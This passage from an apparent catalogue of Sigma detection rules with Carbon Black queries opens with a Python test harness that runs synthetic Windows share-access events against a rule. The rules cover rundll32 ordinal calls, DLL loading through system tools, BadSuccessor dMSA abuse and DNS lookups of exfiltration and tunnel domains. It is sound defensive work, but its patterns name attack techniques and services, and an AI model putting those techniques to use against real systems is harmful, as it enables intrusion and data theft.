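def make_5145(share, target, source_ip="10.0.0.25"):
    """Constructed 5145 message body in Event Viewer layout (synthetic, not a real log)."""
    return f"""An object was accessed while a network share was being checked for access.

Subject:
    Security ID:        S-1-5-21-1111111111-2222222222-3333333333-1105
    Account Name:       jdoe
    Account Domain:     CORP
    Logon ID:           0x3E7A1

Network Information:
    Object Type:        File
    Source Address:     {source_ip}
    Source Port:        49822

Share Information:
    Share Name:         {share}
    Share Path:
    Relative Target Name:   {target}

Access Request Information:
    Access Mask:        0x12019F
"""


# The selection exactly as the YAML writes it; the Sigma-escaped share name decodes
# to the literal string \\*\IPC$ that Windows records for named-pipe access.
RULE_SPOOLSS_PIPE = {
    "EventID": "5145",
    "ShareName": r"\\\\\*\\IPC$",
    "RelativeTargetName": "spoolss",
}


def rule_matches(rule, event):
    return all(
        field in event and sigma_value_to_regex(pattern).fullmatch(event[field]) is not None
        for field, pattern in rule.items()
    )


# Synthetic events: a spoolss pipe open (coercion attempt), a SYSVOL policy read,
# a different IPC$ pipe, and the spooler pipe in upper case (Sigma is case-insensitive).
SAMPLES = [
    (5145, make_5145(r"\\*\IPC$", "spoolss")),
    (5145, make_5145(r"\\*\SYSVOL", r"corp.local\Policies\{31B2F340}\GPT.INI")),
    (5145, make_5145(r"\\*\IPC$", "srvsvc")),
    (5145, make_5145(r"\\*\IPC$", "SPOOLSS")),
]


def evaluate_samples():
    """One verdict per sample, in order."""
    return [rule_matches(RULE_SPOOLSS_PIPE, parse_security_message(eid, msg)) for eid, msg in SAMPLES]


if __name__ == "__main__":
    for (eid, msg), hit in zip(SAMPLES, evaluate_samples()):
        ev = parse_security_message(eid, msg)
        print(f"{eid} {ev['ShareName']:<14} {ev['RelativeTargetName']:<40} alert={hit}")
```

The helper also handles the bare `*` and `?` wildcards that other string-valued selections on this page rely on, so it can be reused to check a rule against a known-good event before trusting a rendered query.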
medium Strong Medium FP
DLL Call by Ordinal Via Rundll32.EXE
Detects calls of DLL exports by ordinal number via rundll32.exe.
status stable author Florian Roth (Nextron Systems) ATT&CK sub-technique id e79a9e79-eb72-4e78-a628-0e7e8f59e89c
carbon_black query
((Image:\\rundll32.exe OR OriginalFileName:RUNDLL32.EXE) (CommandLine:,#* OR CommandLine:,\ #* OR CommandLine:.dll\ #* OR CommandLine:.ocx\ #*)) (-((CommandLine:EDGEHTML.dll* CommandLine:#141*) OR ((ParentImage:\\Msbuild\\Current\\Bin\\* OR ParentImage:\\VC\\Tools\\MSVC\\* OR ParentImage:\\Tracker.exe*) (CommandLine:\\FileTracker32.dll,#1* OR CommandLine:\\FileTracker32.dll\",#1* OR CommandLine:\\FileTracker64.dll,#1* OR CommandLine:\\FileTracker64.dll\",#1*))))
view Sigma YAML
title: DLL Call by Ordinal Via Rundll32.EXE
id: e79a9e79-eb72-4e78-a628-0e7e8f59e89c
status: stable
description: Detects calls of DLL exports by ordinal number via rundll32.exe.
references:
    - https://web.archive.org/web/20200530031906/https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/
    - https://github.com/Neo23x0/DLLRunner
    - https://twitter.com/cyb3rops/status/1186631731543236608
    - https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/
author: Florian Roth (Nextron Systems)
date: 2019-10-22
modified: 2024-07-16
tags:
    - attack.stealth
    - attack.t1218.011
    - detection.threat-hunting
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\rundll32.exe'
        - OriginalFileName: 'RUNDLL32.EXE'
    selection_cli:
        CommandLine|contains:
            - ',#'
            - ', #'
            - '.dll #'  # Sysmon removes , in its log
            - '.ocx #'  # HermeticWizard
    filter_optional_edge:
        CommandLine|contains|all:
            - 'EDGEHTML.dll'
            - '#141'
    filter_optional_vsbuild_dll:
        ParentImage|contains:
            - '\Msbuild\Current\Bin\'
            - '\VC\Tools\MSVC\'
            - '\Tracker.exe'
        CommandLine|contains:
            - '\FileTracker32.dll,#1'
            - '\FileTracker32.dll",#1'
            - '\FileTracker64.dll,#1'
            - '\FileTracker64.dll",#1'
    condition: all of selection_* and not 1 of filter_optional_*
falsepositives:
    - False positives depend on scripts and administrative tools used in the monitored environment.
    - Windows control panel elements have been identified as source (mmc).
level: medium
medium Moderate High FP
DLL Execution Via Register-cimprovider.exe
Detects the use of register-cimprovider.exe to load and execute an arbitrary DLL file.
status test author Ivan Dyachkov, Yulia Fomina, oscd.community ATT&CK technique id a2910908-e86f-4687-aeba-76a5f996e652
carbon_black query
Image:\\register\-cimprovider.exe (CommandLine:\-path* CommandLine:dll*)
view Sigma YAML
title: DLL Execution Via Register-cimprovider.exe
id: a2910908-e86f-4687-aeba-76a5f996e652
status: test
description: Detects the use of register-cimprovider.exe to load and execute an arbitrary DLL file.
references:
    - https://twitter.com/PhilipTsukerman/status/992021361106268161
    - https://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/
author: Ivan Dyachkov, Yulia Fomina, oscd.community
date: 2020-10-07
modified: 2021-11-27
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.execution
    - attack.stealth
    - attack.t1574
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\register-cimprovider.exe'
        CommandLine|contains|all:
            - '-path'
            - 'dll'
    condition: selection
falsepositives:
    - Unknown
level: medium
medium Moderate High FP
DLL Execution via Rasautou.exe
Detects the use of Rasautou.exe to load an arbitrary DLL specified with the -d option and execute the export specified with the -p option.
status test author Julia Fomina, oscd.community ATT&CK technique id cd3d1298-eb3b-476c-ac67-12847de55813
carbon_black query
(Image:\\rasautou.exe OR OriginalFileName:rasdlui.exe) (CommandLine:\ \-d\ * CommandLine:\ \-p\ *)
view Sigma YAML
title: DLL Execution via Rasautou.exe
id: cd3d1298-eb3b-476c-ac67-12847de55813
status: test
description: Detects the use of Rasautou.exe to load an arbitrary DLL specified with the -d option and execute the export specified with the -p option.
references:
    - https://lolbas-project.github.io/lolbas/Binaries/Rasautou/
    - https://github.com/fireeye/DueDLLigence
    - https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html
author: Julia Fomina, oscd.community
date: 2020-10-09
tags:
    - attack.stealth
    - attack.t1218
logsource:
    product: windows
    category: process_creation
    definition: The '-d' and '-p' options were removed in Windows 10, so this rule is only relevant for Windows versions before 10. Windows 7 does not log the command line in event 4688 by default, so detecting this attack requires Sysmon event ID 1 or KB3004375 for command-line auditing (https://support.microsoft.com/en-au/help/3004375/microsoft-security-advisory-update-to-improve-windows-command-line-aud)
detection:
    selection_img:
        - Image|endswith: '\rasautou.exe'
        - OriginalFileName: 'rasdlui.exe'
    selection_cli:
        CommandLine|contains|all:
            - ' -d '
            - ' -p '
    condition: all of selection*
falsepositives:
    - Unlikely
level: medium
medium Moderate Medium FP
DLL Load By System Process From Suspicious Locations
Detects a system process (e.g. one located in System32 or SysWOW64) loading a DLL from a suspicious location or from a location with permissive permissions, such as "C:\Users\Public".
status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK technique id 9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c
carbon_black query
Image:C\:\\Windows\\* (ImageLoaded:C\:\\Users\\Public\\* OR ImageLoaded:C\:\\PerfLogs\\*)
view Sigma YAML
title: DLL Load By System Process From Suspicious Locations
id: 9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c
status: test
description: Detects a system process (e.g. one located in System32 or SysWOW64) loading a DLL from a suspicious location or from a location with permissive permissions, such as "C:\Users\Public".
references:
    - https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC (Idea)
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-17
modified: 2023-09-18
tags:
    - attack.stealth
    - attack.t1070
logsource:
    product: windows
    category: image_load
detection:
    selection:
        Image|startswith: 'C:\Windows\'
        ImageLoaded|startswith:
            # TODO: Add more suspicious paths as you see fit in your env
            - 'C:\Users\Public\'
            - 'C:\PerfLogs\'
    condition: selection
falsepositives:
    - Unknown
level: medium
medium Moderate High FP
DLL Loaded via CertOC.EXE
Detects the use of CertOC.exe with the "-LoadDLL" option, which loads the target DLL file.
status test author Austin Songer @austinsonger ATT&CK technique id 242301bc-f92f-4476-8718-78004a6efd9f
carbon_black query
(Image:\\certoc.exe OR OriginalFileName:CertOC.exe) (CommandLine:\ \-LoadDLL\ * OR CommandLine:\ \/LoadDLL\ * OR CommandLine:\ –LoadDLL\ * OR CommandLine:\ —LoadDLL\ * OR CommandLine:\ ―LoadDLL\ *)
view Sigma YAML
title: DLL Loaded via CertOC.EXE
id: 242301bc-f92f-4476-8718-78004a6efd9f
related:
    - id: 84232095-ecca-4015-b0d7-7726507ee793
      type: similar
status: test
description: Detects the use of CertOC.exe with the "-LoadDLL" option, which loads the target DLL file.
references:
    - https://twitter.com/sblmsrsn/status/1445758411803480072?s=20
    - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2
    - https://lolbas-project.github.io/lolbas/Binaries/Certoc/
author: Austin Songer @austinsonger
date: 2021-10-23
modified: 2024-03-05
tags:
    - attack.stealth
    - attack.t1218
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\certoc.exe'
        - OriginalFileName: 'CertOC.exe'
    selection_cli:
        CommandLine|contains|windash: ' -LoadDLL '
    condition: all of selection_*
falsepositives:
    - Unknown
level: medium
medium Moderate High FP
DLL Names Used By SVR For GraphicalProton Backdoor
Hunts known SVR-specific DLL names.
status test author CISA ATT&CK sub-technique id e64c8ef3-9f98-40c8-b71e-96110991cb4c
carbon_black query
ImageLoaded:\\AclNumsInvertHost.dll OR ImageLoaded:\\AddressResourcesSpec.dll OR ImageLoaded:\\BlendMonitorStringBuild.dll OR ImageLoaded:\\ChildPaletteConnected.dll OR ImageLoaded:\\DeregisterSeekUsers.dll OR ImageLoaded:\\HandleFrequencyAll.dll OR ImageLoaded:\\HardSwapColor.dll OR ImageLoaded:\\LengthInMemoryActivate.dll OR ImageLoaded:\\ModeBitmapNumericAnimate.dll OR ImageLoaded:\\ModeFolderSignMove.dll OR ImageLoaded:\\ParametersNamesPopup.dll OR ImageLoaded:\\PerformanceCaptionApi.dll OR ImageLoaded:\\ScrollbarHandleGet.dll OR ImageLoaded:\\UnregisterAncestorAppendAuto.dll OR ImageLoaded:\\WowIcmpRemoveReg.dll
view Sigma YAML
title: DLL Names Used By SVR For GraphicalProton Backdoor
id: e64c8ef3-9f98-40c8-b71e-96110991cb4c
status: test
description: Hunts known SVR-specific DLL names.
references:
    - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a
author: CISA
date: 2023-12-18
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.execution
    - attack.stealth
    - attack.t1574.001
    - detection.emerging-threats
logsource:
    category: image_load
    product: windows
detection:
    selection:
        ImageLoaded|endswith:
            - '\AclNumsInvertHost.dll'
            - '\AddressResourcesSpec.dll'
            - '\BlendMonitorStringBuild.dll'
            - '\ChildPaletteConnected.dll'
            - '\DeregisterSeekUsers.dll'
            - '\HandleFrequencyAll.dll'
            - '\HardSwapColor.dll'
            - '\LengthInMemoryActivate.dll'
            - '\ModeBitmapNumericAnimate.dll'
            - '\ModeFolderSignMove.dll'
            - '\ParametersNamesPopup.dll'
            - '\PerformanceCaptionApi.dll'
            - '\ScrollbarHandleGet.dll'
            - '\UnregisterAncestorAppendAuto.dll'
            - '\WowIcmpRemoveReg.dll'
    condition: selection
falsepositives:
    - Unknown
level: medium
medium Moderate High FP
DMSA Service Account Created in Specific OUs - PowerShell
Detects the creation of a dMSA service account using the New-ADServiceAccount cmdlet with an explicit OU path. Creating a delegated managed service account in a specific OU with this cmdlet is highly suspicious: it is the pattern used to exploit the BadSuccessor privilege escalation vulnerability in Windows Server 2025. If the user creating the dMSA account is not a legitimate administrator or lacks the necessary permissions, it is a strong signal of attempted or successful abuse of BadSuccessor for privilege escalation within a Windows Server 2025 Active Directory environment.
status experimental author Swachchhanda Shrawan Poudel (Nextron Systems) ATT&CK sub-technique id 02122374-b74e-495c-b285-9e4da973f3d6
carbon_black query
ScriptBlockText:New\-ADServiceAccount* ScriptBlockText:\-CreateDelegatedServiceAccount* ScriptBlockText:\-path*
view Sigma YAML
title: DMSA Service Account Created in Specific OUs - PowerShell
id: 02122374-b74e-495c-b285-9e4da973f3d6
related:
    - id: e15bc294-ae2a-45ad-b7d6-637b33868bde # Windows Security Creation of New MsDS-DelegatedManagedServiceAccount (DMSA) Object
      type: similar
    - id: 0ea8db81-2ff6-4525-9448-33bbe7effc13 # Process Creation Detection
      type: similar
status: experimental
description: |
    Detects the creation of a dMSA service account using the New-ADServiceAccount cmdlet with an explicit OU path.
    Creating a delegated managed service account in a specific OU with this cmdlet is highly suspicious:
    it is the pattern used to exploit the BadSuccessor privilege escalation vulnerability in Windows Server 2025.
    If the user creating the dMSA account is not a legitimate administrator or lacks the necessary permissions,
    it is a strong signal of attempted or successful abuse of BadSuccessor for privilege escalation within a Windows Server 2025 Active Directory environment.
references:
    - https://www.akamai.com/blog/security-research/abusing-bad-successor-for-privilege-escalation-in-active-directory
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-05-24
tags:
    - attack.privilege-escalation
    - attack.initial-access
    - attack.persistence
    - attack.stealth
    - attack.t1078.002
    - attack.t1098
logsource:
    category: ps_script
    product: windows
detection:
    selection:
        ScriptBlockText|contains|all:
            - 'New-ADServiceAccount'
            - '-CreateDelegatedServiceAccount'
            - '-path'
    condition: selection
falsepositives:
    - Unknown
level: medium
medium Moderate High FP
DNS Query Request By Regsvr32.EXE
Detects DNS queries initiated by "Regsvr32.exe"
status test author Dmitriy Lifanov, oscd.community ATT&CK sub-technique id 36e037c4-c228-4866-b6a3-48eb292b9955
carbon_black query
Image:\\regsvr32.exe
view Sigma YAML
title: DNS Query Request By Regsvr32.EXE
id: 36e037c4-c228-4866-b6a3-48eb292b9955
related:
    - id: c7e91a02-d771-4a6d-a700-42587e0b1095
      type: derived
status: test
description: Detects DNS queries initiated by "Regsvr32.exe"
references:
    - https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/
    - https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
author: Dmitriy Lifanov, oscd.community
date: 2019-10-25
modified: 2023-09-18
tags:
    - attack.execution
    - attack.stealth
    - attack.t1559.001
    - attack.t1218.010
logsource:
    category: dns_query
    product: windows
detection:
    selection:
        Image|endswith: '\regsvr32.exe'
    condition: selection
falsepositives:
    - Unknown
level: medium
medium Strong Medium FP
DNS Query To AzureWebsites.NET By Non-Browser Process
Detects a DNS query by a non-browser process on the system to "azurewebsites.net". The latter has often been used by threat actors as a malware hosting and exfiltration site.
status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK sub-technique id e043f529-8514-4205-8ab0-7f7d2927b400
carbon_black query
QueryName:azurewebsites.net (-((Image:C\:\\Program\ Files\\Google\\Chrome\\Application\\chrome.exe OR Image:C\:\\Program\ Files\ \(x86\)\\Google\\Chrome\\Application\\chrome.exe) OR (Image:C\:\\Program\ Files\\Mozilla\ Firefox\\firefox.exe OR Image:C\:\\Program\ Files\ \(x86\)\\Mozilla\ Firefox\\firefox.exe) OR (Image:C\:\\Program\ Files\ \(x86\)\\Internet\ Explorer\\iexplore.exe OR Image:C\:\\Program\ Files\\Internet\ Explorer\\iexplore.exe) OR (Image:C\:\\Program\ Files\ \(x86\)\\Microsoft\\EdgeWebView\\Application\\* OR Image:\\WindowsApps\\MicrosoftEdge.exe OR (Image:C\:\\Program\ Files\ \(x86\)\\Microsoft\\Edge\\Application\\msedge.exe OR Image:C\:\\Program\ Files\\Microsoft\\Edge\\Application\\msedge.exe)) OR ((Image:C\:\\Program\ Files\ \(x86\)\\Microsoft\\EdgeCore\\* OR Image:C\:\\Program\ Files\\Microsoft\\EdgeCore\\*) (Image:\\msedge.exe OR Image:\\msedgewebview2.exe)) OR Image:\\safari.exe OR (Image:\\MsMpEng.exe OR Image:\\MsSense.exe) OR (Image:\\brave.exe Image:C\:\\Program\ Files\\BraveSoftware\\*) OR (Image:\\AppData\\Local\\Maxthon\\* Image:\\maxthon.exe) OR (Image:\\AppData\\Local\\Programs\\Opera\\* Image:\\opera.exe) OR ((Image:C\:\\Program\ Files\\SeaMonkey\\* OR Image:C\:\\Program\ Files\ \(x86\)\\SeaMonkey\\*) Image:\\seamonkey.exe) OR (Image:\\AppData\\Local\\Vivaldi\\* Image:\\vivaldi.exe) OR ((Image:C\:\\Program\ Files\\Naver\\Naver\ Whale\\* OR Image:C\:\\Program\ Files\ \(x86\)\\Naver\\Naver\ Whale\\*) Image:\\whale.exe) OR Image:\\Tor\ Browser\\* OR ((Image:C\:\\Program\ Files\\Waterfox\\* OR Image:C\:\\Program\ Files\ \(x86\)\\Waterfox\\*) Image:\\Waterfox.exe) OR (Image:\\AppData\\Local\\Programs\\midori\-ng\\* Image:\\Midori\ Next\ Generation.exe) OR ((Image:C\:\\Program\ Files\\SlimBrowser\\* OR Image:C\:\\Program\ Files\ \(x86\)\\SlimBrowser\\*) Image:\\slimbrowser.exe) OR (Image:\\AppData\\Local\\Flock\\* Image:\\Flock.exe) OR (Image:\\AppData\\Local\\Phoebe\\* Image:\\Phoebe.exe) OR ((Image:C\:\\Program\ Files\\Falkon\\* OR Image:C\:\\Program\ Files\ \(x86\)\\Falkon\\*) Image:\\falkon.exe) OR ((Image:C\:\\Program\ Files\ \(x86\)\\Avant\ Browser\\* OR Image:C\:\\Program\ Files\\Avant\ Browser\\*) Image:\\avant.exe)))
view Sigma YAML
title: DNS Query To AzureWebsites.NET By Non-Browser Process
id: e043f529-8514-4205-8ab0-7f7d2927b400
related:
    - id: 5c80b618-0dbb-46e6-acbb-03d90bcb6d83
      type: derived
status: test
description: |
    Detects a DNS query by a non browser process on the system to "azurewebsites.net". The latter was often used by threat actors as a malware hosting and exfiltration site.
references:
    - https://www.sentinelone.com/labs/wip26-espionage-threat-actors-abuse-cloud-infrastructure-in-targeted-telco-attacks/
    - https://symantec-enterprise-blogs.security.com/threat-intelligence/harvester-new-apt-attacks-asia
    - https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/
    - https://intezer.com/blog/research/how-we-escaped-docker-in-azure-functions/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2024-06-24
tags:
    - attack.command-and-control
    - attack.t1219.002
logsource:
    product: windows
    category: dns_query
detection:
    selection:
        QueryName|endswith: 'azurewebsites.net'
    filter_optional_chrome:
        Image:
            - 'C:\Program Files\Google\Chrome\Application\chrome.exe'
            - 'C:\Program Files (x86)\Google\Chrome\Application\chrome.exe'
    filter_optional_firefox:
        Image:
            - 'C:\Program Files\Mozilla Firefox\firefox.exe'
            - 'C:\Program Files (x86)\Mozilla Firefox\firefox.exe'
    filter_optional_ie:
        Image:
            - 'C:\Program Files (x86)\Internet Explorer\iexplore.exe'
            - 'C:\Program Files\Internet Explorer\iexplore.exe'
    filter_optional_edge_1:
        - Image|startswith: 'C:\Program Files (x86)\Microsoft\EdgeWebView\Application\'
        - Image|endswith: '\WindowsApps\MicrosoftEdge.exe'
        - Image:
              - 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe'
              - 'C:\Program Files\Microsoft\Edge\Application\msedge.exe'
    filter_optional_edge_2:
        Image|startswith:
            - 'C:\Program Files (x86)\Microsoft\EdgeCore\'
            - 'C:\Program Files\Microsoft\EdgeCore\'
        Image|endswith:
            - '\msedge.exe'
            - '\msedgewebview2.exe'
    filter_optional_safari:
        Image|endswith: '\safari.exe'
    filter_optional_defender:
        Image|endswith:
            - '\MsMpEng.exe' # Microsoft Defender executable
            - '\MsSense.exe' # Windows Defender Advanced Threat Protection Service Executable
    filter_optional_brave:
        Image|endswith: '\brave.exe'
        Image|startswith: 'C:\Program Files\BraveSoftware\'
    filter_optional_maxthon:
        Image|contains: '\AppData\Local\Maxthon\'
        Image|endswith: '\maxthon.exe'
    filter_optional_opera:
        Image|contains: '\AppData\Local\Programs\Opera\'
        Image|endswith: '\opera.exe'
    filter_optional_seamonkey:
        Image|startswith:
            - 'C:\Program Files\SeaMonkey\'
            - 'C:\Program Files (x86)\SeaMonkey\'
        Image|endswith: '\seamonkey.exe'
    filter_optional_vivaldi:
        Image|contains: '\AppData\Local\Vivaldi\'
        Image|endswith: '\vivaldi.exe'
    filter_optional_whale:
        Image|startswith:
            - 'C:\Program Files\Naver\Naver Whale\'
            - 'C:\Program Files (x86)\Naver\Naver Whale\'
        Image|endswith: '\whale.exe'
    filter_optional_tor:
        Image|contains: '\Tor Browser\'
    filter_optional_whaterfox:
        Image|startswith:
            - 'C:\Program Files\Waterfox\'
            - 'C:\Program Files (x86)\Waterfox\'
        Image|endswith: '\Waterfox.exe'
    filter_optional_midori:
        Image|contains: '\AppData\Local\Programs\midori-ng\'
        Image|endswith: '\Midori Next Generation.exe'
    filter_optional_slimbrowser:
        Image|startswith:
            - 'C:\Program Files\SlimBrowser\'
            - 'C:\Program Files (x86)\SlimBrowser\'
        Image|endswith: '\slimbrowser.exe'
    filter_optional_flock:
        Image|contains: '\AppData\Local\Flock\'
        Image|endswith: '\Flock.exe'
    filter_optional_phoebe:
        Image|contains: '\AppData\Local\Phoebe\'
        Image|endswith: '\Phoebe.exe'
    filter_optional_falkon:
        Image|startswith:
            - 'C:\Program Files\Falkon\'
            - 'C:\Program Files (x86)\Falkon\'
        Image|endswith: '\falkon.exe'
    filter_optional_avant:
        Image|startswith:
            - 'C:\Program Files (x86)\Avant Browser\'
            - 'C:\Program Files\Avant Browser\'
        Image|endswith: '\avant.exe'
    condition: selection and not 1 of filter_optional_*
falsepositives:
    - Likely with other browser software. Apply additional filters for any other browsers you might use.
level: medium
level: medium · quality: Moderate · alert volume: High FP
DNS Query To Common Malware Hosting and Shortener Services
Detects DNS queries to domains commonly used by threat actors to host malware payloads or redirect through URL shorteners. These include platforms like Cloudflare Workers, TryCloudflare, InfinityFree, and URL shorteners such as tinyurl and lihi.cc. Such DNS activity can indicate potential delivery or command-and-control communication attempts.
status: experimental · author: Ahmed Nosir (@egycondor) · ATT&CK: sub-technique · id: f8c1e80b-c73a-476a-ae24-6c72528b1521
carbon_black query
QueryName:msapp.workers.dev* OR QueryName:trycloudflare.com* OR QueryName:infinityfreeapp.com* OR QueryName:my5353.com* OR QueryName:reurl.cc* OR QueryName:lihi.cc* OR QueryName:tinyurl.com*
view Sigma YAML
title: DNS Query To Common Malware Hosting and Shortener Services
id: f8c1e80b-c73a-476a-ae24-6c72528b1521
status: experimental
description: |
    Detects DNS queries to domains commonly used by threat actors to host malware payloads or redirect through URL shorteners.
    These include platforms like Cloudflare Workers, TryCloudflare, InfinityFree, and URL shorteners such as tinyurl and lihi.cc.
    Such DNS activity can indicate potential delivery or command-and-control communication attempts.
references:
    - https://cloud.google.com/blog/topics/threat-intelligence/apt41-innovative-tactics
author: Ahmed Nosir (@egycondor)
date: 2025-06-02
tags:
    - attack.command-and-control
    - attack.t1071.004
logsource:
    product: windows
    category: dns_query
detection:
    selection:
        QueryName|contains:
            - 'msapp.workers.dev'
            - 'trycloudflare.com'
            - 'infinityfreeapp.com'
            - 'my5353.com'
            - 'reurl.cc'
            - 'lihi.cc'
            - 'tinyurl.com'
    condition: selection
falsepositives:
    - Legitimate use of these services is possible but rare in enterprise environments
level: medium
level: medium · quality: Moderate · alert volume: High FP
DNS Query To Devtunnels Domain
Detects DNS query requests to Devtunnels domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
status: test · author: citron_ninja · ATT&CK: sub-technique · id: 1cb0c6ce-3d00-44fc-ab9c-6d6d577bf20b
carbon_black query
QueryName:.devtunnels.ms
view Sigma YAML
title: DNS Query To Devtunnels Domain
id: 1cb0c6ce-3d00-44fc-ab9c-6d6d577bf20b
related:
    - id: 9501f8e6-8e3d-48fc-a8a6-1089dd5d7ef4 # Net Connection DevTunnels
      type: similar
    - id: 4b657234-038e-4ad5-997c-4be42340bce4 # Net Connection VsCode
      type: similar
    - id: b3e6418f-7c7a-4fad-993a-93b65027a9f1 # DNS VsCode
      type: similar
status: test
description: |
    Detects DNS query requests to Devtunnels domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
references:
    - https://blueteamops.medium.com/detecting-dev-tunnels-16f0994dc3e2
    - https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/security
    - https://cydefops.com/devtunnels-unleashed
author: citron_ninja
date: 2023-10-25
modified: 2023-11-20
tags:
    - attack.command-and-control
    - attack.t1071.001
    - attack.t1572
logsource:
    category: dns_query
    product: windows
detection:
    selection:
        QueryName|endswith: '.devtunnels.ms'
    condition: selection
falsepositives:
    - Legitimate use of Devtunnels will also trigger this.
level: medium
level: medium · quality: Moderate · alert volume: High FP
DNS Query To MEGA Hosting Website
Detects DNS queries for subdomains related to MEGA sharing website
status: test · author: Aaron Greetham (@beardofbinary) - NCC Group · ATT&CK: sub-technique · id: 613c03ba-0779-4a53-8a1f-47f914a4ded3
carbon_black query
QueryName:userstorage.mega.co.nz*
view Sigma YAML
title: DNS Query To MEGA Hosting Website
id: 613c03ba-0779-4a53-8a1f-47f914a4ded3
related:
    - id: 66474410-b883-415f-9f8d-75345a0a66a6
      type: similar
status: test
description: Detects DNS queries for subdomains related to MEGA sharing website
references:
    - https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/
author: Aaron Greetham (@beardofbinary) - NCC Group
date: 2021-05-26
modified: 2023-09-18
tags:
    - attack.exfiltration
    - attack.t1567.002
logsource:
    product: windows
    category: dns_query
detection:
    selection:
        QueryName|contains: 'userstorage.mega.co.nz'
    condition: selection
falsepositives:
    - Legitimate DNS queries and usage of Mega
level: medium
level: medium · quality: Moderate · alert volume: Medium FP
DNS Query To MEGA Hosting Website - DNS Client
Detects DNS queries for subdomains related to MEGA sharing website
status: test · author: Nasreddine Bencherchali (Nextron Systems) · ATT&CK: sub-technique · id: 66474410-b883-415f-9f8d-75345a0a66a6
carbon_black query
EventID:3008 QueryName:userstorage.mega.co.nz*
view Sigma YAML
title: DNS Query To MEGA Hosting Website - DNS Client
id: 66474410-b883-415f-9f8d-75345a0a66a6
related:
    - id: 613c03ba-0779-4a53-8a1f-47f914a4ded3
      type: similar
status: test
description: Detects DNS queries for subdomains related to MEGA sharing website
references:
    - https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-01-16
tags:
    - attack.exfiltration
    - attack.t1567.002
logsource:
    product: windows
    service: dns-client
    definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event Log must be enabled/collected in order to receive the events.'
detection:
    selection:
        EventID: 3008
        QueryName|contains: 'userstorage.mega.co.nz'
    condition: selection
falsepositives:
    - Legitimate DNS queries and usage of Mega
level: medium
level: medium · quality: Moderate · alert volume: Medium FP
DNS Query To Put.io - DNS Client
Detects DNS queries for subdomains related to "Put.io" sharing website.
status: test · author: Omar Khaled (@beacon_exe) · ATT&CK: tactic-only · id: 8b69fd42-9dad-4674-abef-7fdef43ef92a
carbon_black query
EventID:3008 (QueryName:api.put.io* OR QueryName:upload.put.io*)
view Sigma YAML
title: DNS Query To Put.io - DNS Client
id: 8b69fd42-9dad-4674-abef-7fdef43ef92a
status: test
description: Detects DNS queries for subdomains related to "Put.io" sharing website.
references:
    - https://darkatlas.io/blog/medusa-ransomware-group-opsec-failure
author: Omar Khaled (@beacon_exe)
date: 2024-08-23
tags:
    - attack.command-and-control
logsource:
    product: windows
    service: dns-client
    definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event Log must be enabled/collected in order to receive the events.'
detection:
    selection:
        EventID: 3008
        QueryName|contains:
            - 'api.put.io'
            - 'upload.put.io'
    condition: selection
falsepositives:
    - Legitimate DNS queries and usage of Put.io
level: medium
Showing 201-250 of 1,440